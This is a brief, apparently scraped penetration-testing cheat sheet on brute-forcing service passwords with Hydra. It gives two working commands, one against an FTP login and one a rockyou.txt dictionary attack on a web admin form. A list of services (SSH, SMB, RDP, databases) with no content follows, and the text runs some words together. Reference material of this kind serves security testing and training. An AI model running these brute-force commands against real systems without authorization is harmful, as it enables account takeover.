Brute-force service password
Hydra Switches
$ hydra -l 'elly' -e nsr ftp://192.168.202.148Web
hydra 10.0.0.1 http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l adminLogins
HTTP Basic Auth
HTTP - Post Form
HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle
Hydra attack http get 401 login with a dictionary
SSH
SNMP
Remote Desktop Protocol
AFP
AJP
Cassandra Apache
CouchDB
FTP
IMAP
IRC
ISCSI
LDAP
Mongo
MySQL
OracleSQL
POP3
PostgreSQL
PPTP
Redis
Rexec
Rlogin
Rsh
Rsync
RTSP
SMB
Telnet
VNC
SMTP
Last updated